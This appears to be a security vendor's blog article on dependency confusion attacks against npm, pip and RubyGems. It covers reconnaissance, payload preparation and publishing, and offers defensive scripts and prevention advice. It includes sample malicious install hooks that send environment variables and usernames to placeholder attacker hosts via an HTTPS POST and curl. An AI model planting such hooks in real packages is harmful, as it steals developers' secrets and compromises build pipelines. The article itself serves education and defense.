What Is a Dependency Confusion Attack? Ways to Exploit, Examples, and Impact
Learn how dependency confusion attacks exploit npm and pip. Explore technical examples, exploitation methods, and best practices for prevention.
In the modern software development landscape, developers rarely write every line of code from scratch. Instead, they rely on a massive ecosystem of open-source libraries managed by package managers like npm, PyPI, and RubyGems. While this accelerates development, it introduces a critical vulnerability known as a Dependency Confusion attack. This supply chain threat allows attackers to inject malicious code into internal corporate environments by exploiting the way package managers resolve dependencies.
Understanding the Software Supply Chain
To understand dependency confusion, we first need to look at how modern applications are built. Most organizations use a mix of public and private code. Public code consists of open-source libraries (like React, Express, or Lodash) hosted on public registries such as npmjs.com. Private code consists of internal tools, proprietary logic, and helper libraries hosted on internal, private registries (like Artifactory, Nexus, or GitHub Packages).
When a developer or a build/CI system runs a command like npm install, the package manager reads a manifest file (like package.json). For each dependency listed, the manager must decide where to fetch it from. If the system is configured to check both a private registry and a public registry, the same name can resolve to two different packages. This conflict is the foundation of the dependency confusion vulnerability.
What is a Dependency Confusion Attack?
A Dependency Confusion attack (also known as a namespace confusion attack) occurs when an attacker identifies the name of an internal software package used by a company and then publishes a malicious package with the exact same name to a public registry.
Many package managers, when they can see both a private and a public source, select the highest matching version regardless of where it comes from. As a result, the system automatically downloads and executes the attacker's malicious public package instead of the legitimate internal one.
This flaw was famously brought to light by security researcher Alex Birsan in 2021. He demonstrated that by simply uploading "dummy" packages to public repositories, he could execute code inside the networks of tech giants like Apple, Microsoft, and Tesla, earning over $130,000 in bug bounties.
How the Attack Works: A Step-by-Step Breakdown
The exploitation process generally follows four distinct phases: Reconnaissance, Payload Preparation, Publishing, and Execution.
1. Reconnaissance: Finding Internal Package Names
The first challenge for an attacker is discovering the names of internal packages, which are usually not public. Attackers use several techniques to find these names:
- Public Manifest Files: Developers sometimes accidentally commit package.json, requirements.txt, or Gemfile files to public GitHub repositories.
- JavaScript Source Maps: Many web applications expose .map files or include original source code in the browser. By inspecting the webpack:// paths in a browser's developer tools, an attacker can see the directory structure and names of internal modules.
- Exposed Metadata: Internal build logs, CI/CD configurations, or even leaked documentation can reveal naming conventions like com.company.internal-auth or internal-logger.
- Infrastructure Reconnaissance: Tools like Jsmon can help security teams (and unfortunately, attackers) find exposed assets and metadata that might leak hints about internal infrastructure and naming schemes.
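Defenders can run the same check against their own bundles to see what they leak. The sketch below is a minimal illustration, assuming a standard source map whose "sources" list contains webpack-style paths. The function name and the sample paths are hypothetical.

```python
import json
import re

# Matches the package name that follows a node_modules/ path segment,
# including scoped names such as @scope/name.
_NODE_MODULES = re.compile(r"node_modules/((?:@[^/]+/)?[^/]+)")


def packages_in_source_map(source_map_text: str) -> set[str]:
    """Return package names referenced in a source map's "sources" list."""
    source_map = json.loads(source_map_text)
    names = set()
    for path in source_map.get("sources", []):
        # A path may nest node_modules more than once; collect every match.
        names.update(_NODE_MODULES.findall(path))
    return names


# Hypothetical source map contents, for illustration only.
example = json.dumps({
    "version": 3,
    "sources": [
        "webpack:///./src/app.js",
        "webpack:///./node_modules/lodash/lodash.js",
        "webpack:///./node_modules/internal-logger/index.js",
        "webpack:///./node_modules/@mycompany/auth/index.js",
    ],
})
print(sorted(packages_in_source_map(example)))
```

Any name in the result that does not exist on the public registry is a candidate for the attack described here, so it is worth reviewing before an outsider does.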
2. Payload Preparation
Once a name is identified (e.g., internal-deployment-tool), the attacker creates a malicious version of it. The goal is usually to achieve Remote Code Execution (RCE) or exfiltrate data.
In Node.js, this is often done using the preinstall script in the package.json file. This script runs automatically as soon as the package is downloaded, even before it is required by the application code.
{
  "name": "internal-deployment-tool",
  "version": "99.9.9",
  "description": "I am a malicious package",
  "scripts": {
    "preinstall": "node index.js"
  }
}
The index.js might contain a script to exfiltrate the machine's hostname and environment variables (which often contain API keys) via a DNS lookup or an HTTP request:
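// Runs during "npm install" through the preinstall hook.
const os = require('os');
const https = require('https');

// Collect host details and environment variables.
const data = JSON.stringify({
  hostname: os.hostname(),
  user: os.userInfo().username,
  env: process.env
});

// POST the collected data to a server the attacker controls.
const req = https.request({
  hostname: 'attacker-server.com',
  port: 443,
  path: '/log',
  method: 'POST'
});
req.write(data);
req.end();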
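From the defender's side, install-time hooks like the preinstall script above can be flagged before anything is installed. The following is a minimal sketch that reads a package.json and reports the hooks npm runs automatically during installation. The function name is hypothetical, and the manifest is the one shown earlier.

```python
import json

# npm lifecycle hooks that run automatically during "npm install".
INSTALL_HOOKS = ("preinstall", "install", "postinstall")


def install_hooks(package_json_text: str) -> dict[str, str]:
    """Return the install-time lifecycle scripts declared in a manifest."""
    manifest = json.loads(package_json_text)
    scripts = manifest.get("scripts", {})
    return {hook: scripts[hook] for hook in INSTALL_HOOKS if hook in scripts}


manifest_text = """
{
  "name": "internal-deployment-tool",
  "version": "99.9.9",
  "scripts": {"preinstall": "node index.js"}
}
"""
print(install_hooks(manifest_text))
```

A non-empty result is not proof of malice, since many legitimate packages compile native code at install time, but it marks the packages that deserve a closer look. Running npm install with the --ignore-scripts flag skips these hooks entirely.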
3. Publishing to a Public Registry
The attacker publishes the package to a public registry like npm or PyPI. The key is the version number. By using a very high version number like 99.9.9, the attacker ensures that the package manager sees their version as the "latest" and "most relevant" update compared to the internal version (which might be 1.0.4).
4. Triggering the Execution
The attack is triggered the next time a developer at the target company runs a build or an automated CI/CD pipeline executes. The package manager sees internal-deployment-tool, checks the public registry, finds version 99.9.9, and decides it is the best candidate. The malicious code is pulled down and executed with the permissions of the user running the build.
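The resolution decision at the heart of these four phases can be modeled in a few lines. This is a deliberately simplified sketch and not how npm or pip are actually implemented: it assumes plain dotted numeric versions and ignores version ranges and pre-release tags. The registry labels and function names are hypothetical.

```python
from typing import NamedTuple


class Candidate(NamedTuple):
    registry: str
    version: str


def version_key(version: str) -> tuple[int, ...]:
    """Turn "1.0.4" into (1, 0, 4) so versions compare numerically."""
    return tuple(int(part) for part in version.split("."))


def naive_resolve(candidates: list[Candidate]) -> Candidate:
    """Pick the highest version, ignoring which registry offered it."""
    return max(candidates, key=lambda c: version_key(c.version))


def private_first_resolve(candidates: list[Candidate], private_registry: str) -> Candidate:
    """Consider public candidates only when the private registry has none."""
    private = [c for c in candidates if c.registry == private_registry]
    return naive_resolve(private or candidates)


candidates = [
    Candidate(registry="private", version="1.0.4"),
    Candidate(registry="public", version="99.9.9"),
]
print(naive_resolve(candidates))
print(private_first_resolve(candidates, "private"))
```

The first call selects the attacker's public 99.9.9 release, while the second stays on the internal 1.0.4 release. Which of the two behaviors a real build exhibits depends on how its registries are configured.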
Practical Examples of Dependency Confusion
Example 1: Python (pip)
Python's package installer, pip, is susceptible if configured with multiple index URLs. If a user runs:
pip install --extra-index-url https://internal-repo.company.com/simple internal-lib
pip will check both the internal repo and the public PyPI. If an attacker has uploaded internal-lib to PyPI with a higher version, pip may choose the public one. A malicious setup.py file can be used to execute code during installation:
from setuptools import setup
from setuptools.command.install import install
import os


class CustomInstall(install):
    def run(self):
        # Malicious payload: runs when the package is installed
        os.system('curl http://attacker.com/$(whoami)')
        install.run(self)


setup(
    name='internal-lib',
    version='99.9.9',
    cmdclass={'install': CustomInstall}
)
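A setup.py like this one can be inspected without running it. The sketch below is one possible static check: it parses the file with Python's ast module and lists the commands that a setup() call overrides through cmdclass. The function name is hypothetical, and the check is only a heuristic, because a setup.py can also run arbitrary code at module level without using cmdclass.

```python
import ast


def overridden_commands(setup_py_source: str) -> list[str]:
    """List the setuptools commands a setup() call overrides via cmdclass."""
    tree = ast.parse(setup_py_source)  # parses only; nothing is executed
    commands = []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        # Handle both setup(...) and setuptools.setup(...).
        name = func.id if isinstance(func, ast.Name) else getattr(func, "attr", None)
        if name != "setup":
            continue
        for keyword in node.keywords:
            if keyword.arg == "cmdclass" and isinstance(keyword.value, ast.Dict):
                commands.extend(
                    key.value
                    for key in keyword.value.keys
                    if isinstance(key, ast.Constant) and isinstance(key.value, str)
                )
    return commands


example_setup = '''
from setuptools import setup
from setuptools.command.install import install

class CustomInstall(install):
    def run(self):
        install.run(self)

setup(name="internal-lib", version="99.9.9", cmdclass={"install": CustomInstall})
'''
print(overridden_commands(example_setup))
```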
Example 2: RubyGems
In the Ruby ecosystem, if a Gemfile lists several sources without explicitly tying each gem to one of them, Bundler might search across all defined sources. An attacker who publishes a gem to RubyGems.org with a higher version number than the one on the internal server can then hijack the installation process.
The Impact of Dependency Confusion Attacks
The impact of a successful dependency confusion attack can be devastating because it strikes at the heart of the development environment.
- Remote Code Execution (RCE): The attacker gains the ability to execute arbitrary commands on developer workstations and build servers. This can lead to the total compromise of the CI/CD pipeline.
- Data Exfiltration: Attackers can steal environment variables, which frequently contain secrets like AWS access keys, database passwords, and GitHub tokens.
- Backdooring Software: An attacker could modify the build process to inject a backdoor into the actual product being developed, leading to a massive downstream attack on the company's customers (similar to the SolarWinds incident).
- Intellectual Property Theft: Access to the build environment often means access to the entire source code repository of the organization.
How to Prevent Dependency Confusion
Preventing this attack requires a combination of strict configuration and better visibility into your external attack surface.
1. Use Scoped Packages
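For npm, using scopes is the most effective defense. By naming your internal packages @mycompany/package-name and mapping the scope to your private registry (for example, with a line of the form @mycompany:registry=<private registry URL> in .npmrc), you can configure your package manager to only ever look for @mycompany packages on your private registry. Even if an attacker registers the unscoped name on the public registry, the scope acts as a protected namespace. Registering the same scope as an organization on the public registry closes the remaining gap, because nobody else can then publish under it.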
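Migrating to a scope is easier to track with a small audit. The sketch below assumes you maintain an inventory of internal package names, here a hypothetical internal_names set, and reports which of them a package.json still references outside the company scope.

```python
import json

DEPENDENCY_SECTIONS = ("dependencies", "devDependencies", "optionalDependencies")


def dependencies_outside_scope(
    package_json_text: str, internal_names: set[str], scope: str
) -> list[str]:
    """Return internal dependencies that are not published under `scope`."""
    manifest = json.loads(package_json_text)
    declared = set()
    for section in DEPENDENCY_SECTIONS:
        declared.update(manifest.get(section, {}))
    prefix = scope + "/"
    return sorted(
        name for name in declared
        if name in internal_names and not name.startswith(prefix)
    )


# Hypothetical manifest and inventory, for illustration only.
package_json = json.dumps({
    "dependencies": {
        "@mycompany/auth": "^2.1.0",
        "internal-logger": "^1.0.4",
        "lodash": "^4.17.21",
    }
})
internal_names = {"@mycompany/auth", "internal-logger"}
print(dependencies_outside_scope(package_json, internal_names, "@mycompany"))
```

Here internal-logger is reported because it is internal but unscoped, which makes its name available for anyone to claim on the public registry.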
2. Dependency Pinning and Lockfiles
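Always use lockfiles (package-lock.json, poetry.lock, yarn.lock) and commit them to version control. These files record the exact version and the specific registry (the resolved field) from which a package was downloaded, usually together with an integrity hash. This prevents the package manager from automatically "upgrading" to a malicious version found on a public registry during a fresh install. In CI, prefer commands that install strictly from the lockfile, such as npm ci. Note that a lockfile only protects entries that are already locked: adding or updating a dependency resolves it again, so registry configuration still matters.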
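The resolved field also makes lockfiles auditable. The following sketch assumes the package-lock.json layout used by lockfileVersion 2 and 3, where a top-level "packages" object maps install paths to entries, and an environment in which every package is expected to come through one internal proxy. The host name npm.internal.example.com and the function name are hypothetical.

```python
import json
from urllib.parse import urlparse


def unexpected_resolved_hosts(lockfile_text: str, allowed_hosts: set[str]) -> dict[str, str]:
    """Map install paths to resolved URLs whose host is not in allowed_hosts."""
    lock = json.loads(lockfile_text)
    findings = {}
    for path, entry in lock.get("packages", {}).items():
        resolved = entry.get("resolved")
        if not resolved:
            continue  # the root project entry has no resolved URL
        if urlparse(resolved).hostname not in allowed_hosts:
            findings[path] = resolved
    return findings


# Hypothetical lockfile contents, for illustration only.
lockfile = json.dumps({
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "my-app", "version": "1.0.0"},
        "node_modules/lodash": {
            "version": "4.17.21",
            "resolved": "https://npm.internal.example.com/lodash/-/lodash-4.17.21.tgz",
        },
        "node_modules/internal-deployment-tool": {
            "version": "99.9.9",
            "resolved": "https://registry.npmjs.org/internal-deployment-tool/-/internal-deployment-tool-99.9.9.tgz",
        },
    },
})
print(unexpected_resolved_hosts(lockfile, {"npm.internal.example.com"}))
```

Run as a CI step, a check like this would surface an internal package that was silently resolved from the public registry before the change is merged.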
3. Proper Registry Configuration
Configure your package managers to use a single source of truth. Instead of checking multiple registries, use a private repository manager (like Sonatype Nexus or JFrog Artifactory) as a proxy. The proxy should be configured to prioritize internal repositories and only fetch from public ones if the package is explicitly known to be public.
In Python, avoid using --extra-index-url. Instead, use --index-url to point exclusively to your internal proxy, which handles the routing logic safely.
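A quick way to find existing uses of this option is to scan requirements files for it. The sketch below is a minimal example that reports the line number and content of every --extra-index-url line. The function name and the sample file are hypothetical.

```python
def extra_index_lines(requirements_text: str) -> list[tuple[int, str]]:
    """Return (line number, line) for each --extra-index-url option line."""
    findings = []
    for number, raw in enumerate(requirements_text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # skip blank lines and comments
        if line.startswith("--extra-index-url"):
            findings.append((number, line))
    return findings


# Hypothetical requirements.txt contents, for illustration only.
requirements = """\
# internal packages
--extra-index-url https://internal-repo.company.com/simple
internal-lib==1.0.4
requests==2.31.0
"""
print(extra_index_lines(requirements))
```

The same setting can also come from pip's configuration file or from the PIP_EXTRA_INDEX_URL environment variable, so a requirements scan covers only part of the picture.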
4. Reserve Your Internal Names
As a proactive measure, some organizations "squat" on their own internal names by publishing empty, placeholder packages to public registries. This prevents an attacker from claiming the name first.
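Before reserving names, it helps to know which ones are still unclaimed. The sketch below assumes that the public npm registry (https://registry.npmjs.org/) and the PyPI JSON API (https://pypi.org/pypi/NAME/json) answer 200 for an existing name and 404 for a missing one. The function names are hypothetical, and the demonstration uses a stubbed status lookup so that it runs without network access.

```python
import urllib.error
import urllib.request
from urllib.parse import quote


def http_status(url: str) -> int:
    """Return the HTTP status code for a GET request to url."""
    try:
        with urllib.request.urlopen(url, timeout=10) as response:
            return response.status
    except urllib.error.HTTPError as error:
        return error.code


def name_is_claimed(name: str, registry: str = "npm", get_status=http_status) -> bool:
    """Report whether a package name already exists on a public registry."""
    if registry == "npm":
        # Scoped names keep the "@" but encode the slash as %2F.
        url = "https://registry.npmjs.org/" + quote(name, safe="@")
    elif registry == "pypi":
        url = f"https://pypi.org/pypi/{quote(name)}/json"
    else:
        raise ValueError(f"unsupported registry: {registry}")
    status = get_status(url)
    if status == 200:
        return True
    if status == 404:
        return False
    raise RuntimeError(f"unexpected status {status} for {url}")


# Stubbed lookup for the demonstration; omit get_status to query the registry.
def fake_status(url: str) -> int:
    return 200 if url.endswith("/internal-logger") else 404


print(name_is_claimed("internal-logger", get_status=fake_status))
print(name_is_claimed("@mycompany/auth", get_status=fake_status))
```

A name that is reported as claimed but was not published by your organization deserves immediate investigation, since it may already be an attacker's package.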
Conclusion
Dependency confusion is a subtle yet powerful attack vector that exploits the inherent trust we place in automated build tools. As organizations continue to scale their internal libraries, the risk of namespace collisions increases. By implementing scoped packages, maintaining strict lockfiles, and ensuring proper registry routing, companies can significantly reduce their exposure to this supply chain threat.
Visibility is the first step in defense. To proactively monitor your organization's external attack surface and catch exposures like leaked manifest files or internal package names before attackers do, try Jsmon.